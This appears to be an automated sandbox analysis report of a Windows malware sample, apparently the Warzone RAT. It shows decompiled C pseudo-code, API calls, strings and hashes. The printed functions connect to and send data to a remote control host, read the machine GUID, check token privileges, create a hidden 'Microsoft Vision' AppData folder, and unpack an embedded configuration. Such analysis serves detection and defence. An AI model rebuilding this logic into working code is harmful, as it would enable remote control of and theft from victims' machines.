Part of subcall function 0040D724: GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,00000000), ref: 0040D75B
Part of subcall function 0040D724: CloseHandle.KERNEL32(00000000), ref: 0040D770

Part of subcall function 0040D56A: LoadLibraryA.KERNEL32(ntdll.dll), ref: 0040D582
Part of subcall function 0040D56A: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0040D592

Part of subcall function 0040D7E0: RegOpenKeyExW.KERNEL32 ref: 0040D824

SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00402BC1
lstrcatW.KERNEL32 ref: 00402BD3
CreateDirectoryW.KERNEL32(?,00000000), ref: 00402BE1

Part of subcall function 00408431: InitializeCriticalSection.KERNEL32(?,?,?,?,?,?,00402BEF,?,00000001), ref: 0040843D
Part of subcall function 00408431: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,00402BEF,?,00000001), ref: 00408454
Part of subcall function 00408431: EnterCriticalSection.KERNEL32(004177C0,?,?,?,?,?,00402BEF,?,00000001), ref: 00408460
Part of subcall function 00408431: GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,00402BEF,?,00000001), ref: 00408470
Part of subcall function 00408431: LeaveCriticalSection.KERNEL32(004177C0), ref: 004084C3

Strings

\Microsoft Vision\, xrefs: 00402BC7
h$@, xrefs: 00402BF2

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: CriticalFileSection$HandleProcess$CloseCreateCurrentModuleNameOpenTokenlstrlen$AddressComputerDeleteDirectoryEnterFolderInformationInitializeLeaveLibraryLoadPathProcReadSizelstrcatlstrcpy
String ID: \Microsoft Vision\$h$@
API String ID: 124308011-95466046
Opcode ID: 6c2ea5f1df32180b2cc7de1862a89e49b445567976ccfd72f65e3efbf6581580
Instruction ID: 5e107a4da3c907c550ed5c7b01739eb642fc80a80227b137f1cf39db7e775c70
Opcode Fuzzy Hash: 6c2ea5f1df32180b2cc7de1862a89e49b445567976ccfd72f65e3efbf6581580
Instruction Fuzzy Hash: A52162B1A002087BDB15FBA5DD86EEE776C9F44308F00447FB505F21C1EAB86A488B68

Uniqueness

Uniqueness Score: -1.00%

Function 00405294 Relevance: 9.1, APIs: 6, Instructions: 75
networksynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E00405294(void* __ecx, void* __eflags, char _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v28;
				intOrPtr _v32;
				void _v40;
				void* _t36;
				signed int _t40;
				signed int _t42;
				void* _t44;
				signed int _t47;
				intOrPtr _t53;
				intOrPtr _t54;
				signed int* _t55;

				_v8 = _v8 & 0x00000000;
				_t44 = __ecx; // executed
				E00402EEB(__ecx,  &_a4); // executed
				 *((intOrPtr*)(_t44 + 4)) = _a8;
				E0040DD97(_t44 + 0x1d8);
				_t47 = 8;
				memset( &_v40, 0, _t47 << 2);
				_v28 = 6;
				_t36 =  &_v40;
				_t53 = 1;
				_v32 = 1;
				__imp__getaddrinfo(_a4, 0, _t36,  &_v8); // executed
				if(_t36 != 0) {
					L4:
					_t53 = 0;
				} else {
					_t54 =  *((intOrPtr*)(_v8 + 0x18));
					_t40 = 2;
					__imp__#23(_t40, 1, 0); // executed
					 *(_t44 + 0xc) = _t40;
					if(_t40 == 0xffffffff) {
						goto L4;
					} else {
						_t55 = _t44 + 0x1c8;
						 *((intOrPtr*)(_t44 + 0x1cc)) =  *((intOrPtr*)(_t54 + 4));
						_t42 = 2;
						 *_t55 = _t42;
						__imp__#9(_a8);
						 *(_t44 + 0x1ca) = _t42;
						__imp__freeaddrinfo(_v8);
						__imp__#4( *(_t44 + 0xc), _t55, 0x10); // executed
						if(_t42 != 0xffffffff) {
							 *((intOrPtr*)(_t44 + 8)) = 1;
							ReleaseMutex( *(_t44 + 0x1d8));
						} else {
							 *(_t44 + 0xc) =  *(_t44 + 0xc) | _t42;
							goto L4;
						}
					}
				}
				E004058FB(_a4);
				return _t53;
			}

0x0040529a
0x004052a5
0x004052a7
0x004052b5
0x004052b8
0x004052bf
0x004052c5
0x004052ca
0x004052d2
0x004052dd
0x004052de
0x004052e1
0x004052e9
0x00405348
0x00405348
0x004052eb
0x004052f3
0x004052f6
0x004052f8
0x004052fe
0x00405304
0x00000000
0x00405306
0x00405309
0x00405311
0x00405317
0x0040531b
0x0040531e
0x00405327
0x0040532e
0x0040533a
0x00405343
0x00405361
0x00405364
0x00405345
0x00405345
0x00000000
0x00405345
0x00405343
0x00405304
0x0040534d
0x00405358

APIs

Part of subcall function 00402EEB: lstrcatA.KERNEL32(00000000,?,?,00000000,?,0040338A,00000000,00000000,?,004049AA,?,?,?,?,?), ref: 00402F17

Part of subcall function 0040DD97: WaitForSingleObject.KERNEL32(?,000000FF,004052BD,?,?,?,00000000,004049B2,?,?,?,?,?), ref: 0040DD9B

getaddrinfo.WS2_32(?,00000000,004049B2,00000000), ref: 004052E1
socket.WS2_32(00000002,00000001,00000000), ref: 004052F8
htons.WS2_32(?), ref: 0040531E
freeaddrinfo.WS2_32(00000000), ref: 0040532E
connect.WS2_32(?,?,00000010), ref: 0040533A
ReleaseMutex.KERNEL32(?), ref: 00405364

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: MutexObjectReleaseSingleWaitconnectfreeaddrinfogetaddrinfohtonslstrcatsocket
String ID:
API String ID: 2516106447-0
Opcode ID: 923dc3b2e14cf5ab7a56870233bd30a359ff79c3679890ae838977fd83e5dac2
Instruction ID: 6b31b230f32404f8442b0296e7e7382ea5fa347a85132987204c129c8f995715
Opcode Fuzzy Hash: 923dc3b2e14cf5ab7a56870233bd30a359ff79c3679890ae838977fd83e5dac2
Instruction Fuzzy Hash: FA217E31A00204ABDF10DFA1CC84ADEBBB8EF44310F108066ED05EB1A1C7B59A51DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00408431 Relevance: 7.5, APIs: 5, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00408431(intOrPtr _a4, intOrPtr _a8) {
				void _v28;
				void* _t13;
				signed int _t14;

				InitializeCriticalSection( &_v28);
				_t14 = 6;
				DeleteCriticalSection(memcpy(0x4177c0,  &_v28, _t14 << 2));
				EnterCriticalSection(0x4177c0);
				 *0x4177e8 = _a4;
				GetModuleHandleA(0);
				 *0x4166ac = 0x416d98;
				if(_a8 == 0) {
					E00401EB9(0x41780c);
					 *0x416d98 = 1;
					_t13 = E00401E8E(0x417804, E004080AA, 0x416d98);
				} else {
					_t13 = E00401E8E(0x41780c, E00407376, 0x416d98); // executed
					 *0x4177ac = 1;
				}
				LeaveCriticalSection(0x4177c0);
				return _t13;
			}

0x0040843d
0x00408445
0x00408454
0x00408460
0x0040846b
0x00408470
0x0040847f
0x0040848a
0x004084a3
0x004084b3
0x004084bd
0x0040848c
0x00408492
0x00408497
0x00408497
0x004084c3
0x004084cc

APIs

InitializeCriticalSection.KERNEL32(?,?,?,?,?,?,00402BEF,?,00000001), ref: 0040843D
DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,00402BEF,?,00000001), ref: 00408454
EnterCriticalSection.KERNEL32(004177C0,?,?,?,?,?,00402BEF,?,00000001), ref: 00408460
GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,00402BEF,?,00000001), ref: 00408470
LeaveCriticalSection.KERNEL32(004177C0), ref: 004084C3

Part of subcall function 00401E8E: CreateThread.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 00401EA3

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: CriticalSection$CreateDeleteEnterHandleInitializeLeaveModuleThread
String ID:
API String ID: 2964645253-0
Opcode ID: 3361ec2705fb206e063114806a935c0344e12ffb39e03853e8c577b0464dc2c5
Instruction ID: 2d2841456ea70906bd5f85986132460682fd0c923a575534e8b6154dd4be7def
Opcode Fuzzy Hash: 3361ec2705fb206e063114806a935c0344e12ffb39e03853e8c577b0464dc2c5
Instruction Fuzzy Hash: 04014071A04205ABC700AF55DD4EBDF3B78EB45714F01803AFA09A62D0CBB89485CBE9

Uniqueness

Uniqueness Score: -1.00%

Function 00410C39 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E00410C39(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _v28;
				char _v32;
				short _v552;
				void* _t34;

				_t34 = __edx;
				_v8 = 0;
				E00401052( &_v552, 0, 0x208);
				__imp__SHGetFolderPathW(0, 0x1c, 0, 0,  &_v552);
				lstrcatW( &_v552, L"\\Microsoft Vision\\");
				E00403230( &_v8, _t34, 0,  &_v552); // executed
				_v32 = 0x3b;
				asm("xorps xmm0, xmm0");
				_v28 = 0;
				asm("movups [ebp-0x14], xmm0");
				E0040343F(E00403527( &_v32, _t34,  &_v8), 0, _a4);
				E0040342B( &_v32);
				E004058FB(_v8);
				return _a4;
			}

0x00410c39
0x00410c52
0x00410c55
0x00410c69
0x00410c7b
0x00410c8b
0x00410c96
0x00410c9d
0x00410ca0
0x00410ca7
0x00410cb2
0x00410cba
0x00410cc2
0x00410ccc

APIs

SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00410C69
lstrcatW.KERNEL32 ref: 00410C7B

Part of subcall function 004058FB: VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903

Strings

\Microsoft Vision\, xrefs: 00410C6F
;, xrefs: 00410C96

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: FolderFreePathVirtuallstrcat
String ID: ;$\Microsoft Vision\
API String ID: 1529938272-253167065
Opcode ID: 671af2f9eab6c763be752264ea81ad865cbfc2137a26b04bf5b2011f3fdc0044
Instruction ID: 6685fcf80b4406b8bbd98487c845a56216651f42fbaf94eb2e3c560c049c9310
Opcode Fuzzy Hash: 671af2f9eab6c763be752264ea81ad865cbfc2137a26b04bf5b2011f3fdc0044
Instruction Fuzzy Hash: 76013C71C00119AACB11EFA1ED49DDFBB7CAF18304F00416AB505B2091EB78AB45CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00405738 Relevance: 6.1, APIs: 4, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			_entry_() {
				struct _STARTUPINFOA _v72;
				intOrPtr _t6;
				int _t11;
				intOrPtr _t15;
				intOrPtr* _t16;
				intOrPtr* _t18;
				intOrPtr _t20;
				void* _t21;

				_t16 = GetCommandLineA();
				_t6 =  *_t16;
				if(_t6 != 0x22) {
					while(1) {
						__eflags = _t6 - 0x20;
						if(_t6 <= 0x20) {
							break;
						}
						_t16 = _t16 + 1;
						__eflags = _t16;
						_t6 =  *_t16;
					}
					L12:
					if(_t6 != 0) {
						__eflags = _t6 - 0x20;
						if(_t6 > 0x20) {
							goto L13;
						}
						_t16 = _t16 + 1;
						__eflags = _t16;
						L11:
						_t6 =  *_t16;
						goto L12;
					}
					L13:
					_t2 =  &(_v72.dwFlags);
					_v72.dwFlags = _v72.dwFlags & 0x00000000;
					GetStartupInfoA( &_v72);
					E004057C6();
					E004057F3(0x416000, 0x41602c);
					GetModuleHandleA(0);
					_t11 = E00410A7C(0x41602c, _t21,  *_t2, 0x416000, 0x416000); // executed
					E004057DB();
					ExitProcess(_t11);
				}
				_t18 = _t16 + 1;
				_t20 =  *_t18;
				if(_t20 == 0) {
					L5:
					_t1 = _t18 + 1; // 0x3
					_t14 =  !=  ? _t18 : _t1;
					_t16 =  !=  ? _t18 : _t1;
					goto L11;
				}
				_t15 = _t20;
				while(1) {
					_t20 = _t15;
					if(_t15 == 0x22) {
						goto L5;
					}
					_t18 = _t18 + 1;
					_t20 =  *_t18;
					_t15 = _t20;
					if(_t20 != 0) {
						continue;
					}
					goto L5;
				}
				goto L5;
			}

0x00405745
0x00405747
0x0040574b
0x00405775
0x00405775
0x00405777
0x00000000
0x00000000
0x00405772
0x00405772
0x00405773
0x00405773
0x00405782
0x00405784
0x0040577b
0x0040577d
0x00000000
0x00000000
0x0040577f
0x0040577f
0x00405780
0x00405780
0x00000000
0x00405780
0x00405786
0x00405786
0x00405786
0x0040578e
0x00405794
0x004057a3
0x004057aa
0x004057b2
0x004057b9
0x004057bf
0x004057bf
0x0040574d
0x0040574e
0x00405752
0x00405765
0x00405765
0x0040576b
0x0040576e
0x00000000
0x0040576e
0x00405754
0x00405756
0x00405756
0x0040575a
0x00000000
0x00000000
0x0040575c
0x0040575d
0x0040575f
0x00405763
0x00000000
0x00000000
0x00000000
0x00405763
0x00000000

APIs

GetCommandLineA.KERNEL32 ref: 0040573F
GetStartupInfoA.KERNEL32 ref: 0040578E
GetModuleHandleA.KERNEL32(00000000), ref: 004057AA
ExitProcess.KERNEL32 ref: 004057BF

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: CommandExitHandleInfoLineModuleProcessStartup
String ID:
API String ID: 2164999147-0
Opcode ID: b54e49e6b1be417e56fdc4c920da3e00334b25d2d339193ffcc2689d20b6eccd
Instruction ID: 6c2cde08bac8e1cfe51f4b79fa0261da6436e6723f3ca5280809e9b0f5d84409
Opcode Fuzzy Hash: b54e49e6b1be417e56fdc4c920da3e00334b25d2d339193ffcc2689d20b6eccd
Instruction Fuzzy Hash: C30126384446059FC7246B74A4866FB3F96EF0A308F64107EE581E7392D63E4C4BAE1D

Uniqueness

Uniqueness Score: -1.00%

Function 0040F5C8 Relevance: 6.0, APIs: 4, Instructions: 42
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 88%

			E0040F5C8(CHAR* __ecx, long* __edx) {
				long _v8;
				void* _t5;
				long _t6;
				void* _t11;
				long* _t18;
				void* _t22;

				_push(__ecx);
				_t18 = __edx;
				_t11 = E004010AD(0x400000);
				_v8 = 0;
				_t5 = CreateFileA(__ecx, 0x80000000, 0, 0, 3, 0x80, 0); // executed
				_t22 = _t5;
				_t6 = GetFileSize(_t22, 0);
				 *_t18 = _t6;
				ReadFile(_t22, _t11, _t6,  &_v8, 0); // executed
				CloseHandle(_t22); // executed
				return _t11;
			}

0x0040f5cb
0x0040f5d4
0x0040f5de
0x0040f5f2
0x0040f5f5
0x0040f5fb
0x0040f600
0x0040f60b
0x0040f611
0x0040f618
0x0040f624

APIs

Part of subcall function 004010AD: GetProcessHeap.KERNEL32(00000000,00000000,0040F16C,00000800,00000000,00000000,00000000,00000000,?,0040F2C1,?,?,00405268,?,?,000000FE), ref: 004010B3
Part of subcall function 004010AD: RtlAllocateHeap.NTDLL(00000000,?,0040F2C1,?,?,00405268,?,?,000000FE,?,000000FE,?,00000000,?,?,00000000), ref: 004010BA

CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 0040F5F5
GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,00402B35), ref: 0040F600
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040F611
CloseHandle.KERNEL32(00000000), ref: 0040F618

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
String ID:
API String ID: 2517252058-0
Opcode ID: 7a2ffbd97ecdeb6ab384a92e8b9be7296810692c199c72bd8959b4056ca9af23
Instruction ID: 44e20b48cd2725d3dbedd8bfa1308a904f45e9990ff034d85ea13025c03292e5
Opcode Fuzzy Hash: 7a2ffbd97ecdeb6ab384a92e8b9be7296810692c199c72bd8959b4056ca9af23
Instruction Fuzzy Hash: 1BF05EB2641214BFF3159B65AD09FFB7A9CEB49614F10413AFA01E2180EAF45E1087B8

Uniqueness

Uniqueness Score: -1.00%

Function 0040D724 Relevance: 6.0, APIs: 4, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040D724() {
				void* _v8;
				long _v12;
				void _v16;
				long _t21;
				void* _t22;

				_t22 = 0;
				_v8 = 0;
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v8) != 0) {
					_t21 = 4;
					_v12 = _t21;
					GetTokenInformation(_v8, 0x14,  &_v16, _t21,  &_v12); // executed
					_t22 =  !=  ? _v16 : 0;
				}
				if(_v8 != 0) {
					CloseHandle(_v8); // executed
				}
				return 0 | _t22 != 0x00000000;
			}

0x0040d72e
0x0040d733
0x0040d745
0x0040d749
0x0040d74d
0x0040d75b
0x0040d763
0x0040d763
0x0040d76b
0x0040d770
0x0040d770
0x0040d77f

APIs

GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,00000000), ref: 0040D736
OpenProcessToken.ADVAPI32(00000000,?,?,?,00000000), ref: 0040D73D
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,00000000), ref: 0040D75B
CloseHandle.KERNEL32(00000000), ref: 0040D770

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: ProcessToken$CloseCurrentHandleInformationOpen
String ID:
API String ID: 215268677-0
Opcode ID: efad12f8f23d9c5b4d6586bbf194436d77310c542ac163874c30d65ace41b49c
Instruction ID: 4492c61e6b550e3af3179b2085cc6d2a46ba6f3733013c0b624f8fa2c4906e35
Opcode Fuzzy Hash: efad12f8f23d9c5b4d6586bbf194436d77310c542ac163874c30d65ace41b49c
Instruction Fuzzy Hash: BEF0F971E00218FBDB11ABA0DE49BDEBBB8EF08741F118166EA01F6190D7709F58DB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040D7E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 33%

			E0040D7E0(intOrPtr* __ecx, void* __edx) {
				void* _v8;
				char _v12;
				char _v16;
				int _v20;
				char _v24;
				int* _t18;
				short** _t23;
				void* _t31;
				void* _t48;
				int* _t50;
				intOrPtr _t53;

				_t48 = __edx;
				_t35 = __ecx;
				_t50 = __ecx;
				_v8 = 0;
				_v24 = 0;
				_v20 = 0;
				 *((intOrPtr*)(__ecx)) = 0;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				_t53 =  *0x417d38; // 0x14
				if(_t53 != 0) {
					_t18 = 0x417d34;
				} else {
					_t23 = E004033AB( &_v12, L"SOFTWARE\\Microsoft\\Cryptography"); // executed
					RegOpenKeyExW(0x80000002,  *_t23, 0, 0x101,  &_v8); // executed
					asm("sbb esi, esi");
					E004058FB(_v12);
					if(1 != 0) {
						_t31 = E004033AB( &_v12, L"MachineGuid"); // executed
						E0040EAAE( &_v8, _t48, _t31,  &_v24); // executed
						E004058FB(_v12);
						E0040EA99( &_v8);
					}
					E00402C65(_t50, E00405AD0( &_v16,  &_v24));
					E00402DFF( &_v16);
					_t35 = 0x417d34;
					_t18 = _t50;
				}
				E00402C65(_t35, _t18);
				E00402DFF( &_v24);
				E0040EA99( &_v8);
				return _t50;
			}

0x0040d7e0
0x0040d7e0
0x0040d7ea
0x0040d7ec
0x0040d7ef
0x0040d7f2
0x0040d7f5
0x0040d7f7
0x0040d7fa
0x0040d800
0x0040d889
0x0040d806
0x0040d80e
0x0040d824
0x0040d82f
0x0040d831
0x0040d839
0x0040d847
0x0040d850
0x0040d858
0x0040d860
0x0040d860
0x0040d873
0x0040d87b
0x0040d880
0x0040d885
0x0040d885
0x0040d88f
0x0040d897
0x0040d89f
0x0040d8a9

APIs

Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,00000000,?,0040F5B0,00000000,?,00000000), ref: 004033B4
Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,?,0040F5B0,00000000,?,00000000), ref: 004033CB
Part of subcall function 004033AB: lstrcpyW.KERNEL32(?,0040F5B0), ref: 004033E6

RegOpenKeyExW.KERNEL32 ref: 0040D824

Part of subcall function 004058FB: VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903

Part of subcall function 0040EAAE: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,00000000), ref: 0040EAD1
Part of subcall function 0040EAAE: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,00000000), ref: 0040EAF4

Part of subcall function 0040EA99: RegCloseKey.KERNEL32(?), ref: 0040EAA3

Strings

MachineGuid, xrefs: 0040D83F
SOFTWARE\Microsoft\Cryptography, xrefs: 0040D806

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: QueryValuelstrlen$CloseFreeOpenVirtuallstrcpy
String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
API String ID: 1903904756-1211650757
Opcode ID: 685828e6394bcdeec3cc7687aadba9dd991944d549eb196bf2b51eac8efd4c13
Instruction ID: 3485716d3ccfc602a361c21eb5c9630b085821e7e035ac54aee7b03651fb82ed
Opcode Fuzzy Hash: 685828e6394bcdeec3cc7687aadba9dd991944d549eb196bf2b51eac8efd4c13
Instruction Fuzzy Hash: 0F116071A00119ABCB04FBA6C9568EEB739EF58704B60457FB402B31D1DBB81F45DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00405042 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
networkCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00405042(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v12;
				char _v16;
				char _v24;
				void* _t15;
				void* _t21;
				void* _t38;
				intOrPtr _t39;
				void* _t40;

				_t37 = __edx;
				_t38 = __ecx;
				if( *((intOrPtr*)(__ecx + 0xc)) != 0xffffffff) {
					_t15 = E00403185( &_v12, "warzone160"); // executed
					E00402DCC( &_v24, __edx, _t15);
					_t31 = _v12;
					E004058FB(_v12);
					_t39 = _a4;
					_t32 = _t40;
					E00402E12(_t40, _t39);
					E00402E12(_t40,  &_v24);
					_t7 =  &_v16; // 0x404a5b
					_t21 = E00405B00(_t7, _t37, _t40, _t32, _v12, _t31);
					_t9 =  &_v16; // 0x404a5b
					_t10 = _t38 + 0xc; // 0x411141, executed
					__imp__#19( *_t10,  *_t9,  *((intOrPtr*)(_t39 + 4)), 0); // executed
					E00402DFF( &_v16);
					E00402DFF( &_v24);
					return 0 | _t21 != 0xffffffff;
				}
				return 0;
			}

0x00405042
0x0040504b
0x00405051
0x0040505f
0x00405068
0x0040506d
0x00405070
0x00405075
0x0040507a
0x0040507d
0x0040508a
0x0040508f
0x00405092
0x0040509f
0x004050a2
0x004050a5
0x004050b6
0x004050be
0x00000000
0x004050c3
0x00000000

APIs

send.WS2_32(00411141,[J@,?,00000000), ref: 004050A5

Strings

warzone160, xrefs: 00405057
[J@, xrefs: 0040508F, 0040509F

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: send
String ID: [J@$warzone160
API String ID: 2809346765-2561178365
Opcode ID: 684c6170833937b7d6efc60c98c44ea8ea27d2dacfb2c308b00d3130ae1ffb71
Instruction ID: 247fd1eedd487120c80dd6edb002f6aa9a683da3d56d4597779b5c6f9612ebd2
Opcode Fuzzy Hash: 684c6170833937b7d6efc60c98c44ea8ea27d2dacfb2c308b00d3130ae1ffb71
Instruction Fuzzy Hash: D801F5719004057BCB04FBA5CD4ACEFB739EF50324B50423EF122720D1EBB86E159AA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040549D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 138
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040549D(char __ecx, void* __edx, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v24;
				char _v32;
				char _v72;
				char _v148;
				void* _t72;
				void* _t83;
				intOrPtr* _t110;
				char _t157;
				void* _t158;
				void* _t159;
				void* _t160;
				void* _t161;
				void* _t162;
				void* _t163;
				void* _t164;
				intOrPtr _t166;
				intOrPtr _t167;
				intOrPtr _t168;
				intOrPtr _t169;
				intOrPtr* _t170;

				_t157 = __ecx;
				_v8 = __ecx;
				E0040DF77( &_v148, __eflags);
				E0040DE6E( &_v148, GetModuleHandleA(0)); // executed
				_t72 = E00403185( &_v12, ".bss"); // executed
				E0040DDE1( &_v148,  &_v72, _t72); // executed
				E004058FB(_v12);
				E00402E12( &_v16,  &_v32);
				E00402C65(_t157 + 0x3c,  &_v16); // executed
				E00402DFF( &_v16);
				E004053F7(_t157,  &_v24);
				_t110 = _v24;
				_t166 =  *_t110;
				_t83 = E0040F56D( &_v12, _t110 + 4, _t166); // executed
				E004031FD(_t157 + 0x10, _t83); // executed
				E004058FB(_v12);
				_t158 = _t166 + 4;
				 *((intOrPtr*)(_v8 + 0x14)) =  *((intOrPtr*)(_t110 + _t158));
				_t167 =  *((intOrPtr*)(_t110 + _t158 + 4));
				_t159 = _t158 + 8;
				E004031FD(_v8 + 0x28, E0040F56D( &_v12, _t110 + _t159, _t167));
				E004058FB(_v12);
				_t160 = _t159 + _t167;
				 *((intOrPtr*)(_v8 + 0x18)) =  *((char*)(_t110 + _t160));
				_t168 =  *((intOrPtr*)(_t110 + _t160 + 1));
				_t161 = _t160 + 5;
				E004031FD(_v8 + 0x1c, E0040F56D( &_v12, _t110 + _t161, _t168));
				E004058FB(_v12);
				_t162 = _t161 + _t168;
				 *((intOrPtr*)(_v8 + 0x20)) =  *((char*)(_t110 + _t162));
				_t169 =  *((intOrPtr*)(_t110 + _t162 + 1));
				_t163 = _t162 + 5;
				E004031FD(_v8 + 0x24, E0040F56D( &_v12, _t110 + _t163, _t169));
				E004058FB(_v12);
				_t164 = _t163 + _t169;
				_t170 = _v8;
				 *((intOrPtr*)(_t170 + 0x2c)) =  *((intOrPtr*)(_t110 + _t164));
				 *((intOrPtr*)(_t170 + 0x34)) =  *((char*)(_t110 + _t164 + 4));
				 *((intOrPtr*)(_t170 + 0x38)) =  *((char*)(_t110 + _t164 + 5));
				E0040F56D( &_v8, _t110 + 4 + _t164 + 6,  *((intOrPtr*)(_t110 + _t164 + 6))); // executed
				E004031FD(_t170 + 0x30,  &_v8); // executed
				 *_t170 = 1;
				 *((intOrPtr*)(_t170 + 4)) = 1;
				E004058FB(_v8);
				E00402DFF( &_v24);
				E00402DFF( &_v32);
				return E00401DA8( &_v148);
			}

0x004054a9
0x004054b1
0x004054b4
0x004054c8
0x004054d5
0x004054e5
0x004054ed
0x004054f9
0x00405505
0x0040550d
0x00405518
0x0040551d
0x00405523
0x00405529
0x00405533
0x0040553b
0x00405543
0x00405549
0x0040554f
0x00405553
0x00405567
0x0040556f
0x00405577
0x0040557d
0x00405583
0x00405587
0x0040559b
0x004055a3
0x004055ab
0x004055b1
0x004055b7
0x004055bb
0x004055cf
0x004055d7
0x004055dc
0x004055e1
0x004055ea
0x004055f2
0x004055fd
0x00405605
0x00405612
0x0040561d
0x0040561f
0x00405622
0x0040562a
0x00405632
0x00405646

APIs

GetModuleHandleA.KERNEL32(00000000,?,?,00000000), ref: 004054BB

Part of subcall function 00403185: lstrlenA.KERNEL32(?,?,?,004054DA,.bss,00000000,?,?,00000000), ref: 0040318E
Part of subcall function 00403185: lstrlenA.KERNEL32(?,?,?,004054DA,.bss,00000000,?,?,00000000), ref: 0040319B
Part of subcall function 00403185: lstrcpyA.KERNEL32(00000000,?,?,?,004054DA,.bss,00000000,?,?,00000000), ref: 004031AE

Part of subcall function 004058FB: VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903

Part of subcall function 004031FD: lstrcpyW.KERNEL32(00000000,00000000), ref: 00403222

Strings

.bss, xrefs: 004054CD

Memory Dump Source

Source File: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gnwnekc.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$FreeHandleModuleVirtual
String ID: .bss
API String ID: 3541657707-3890483948
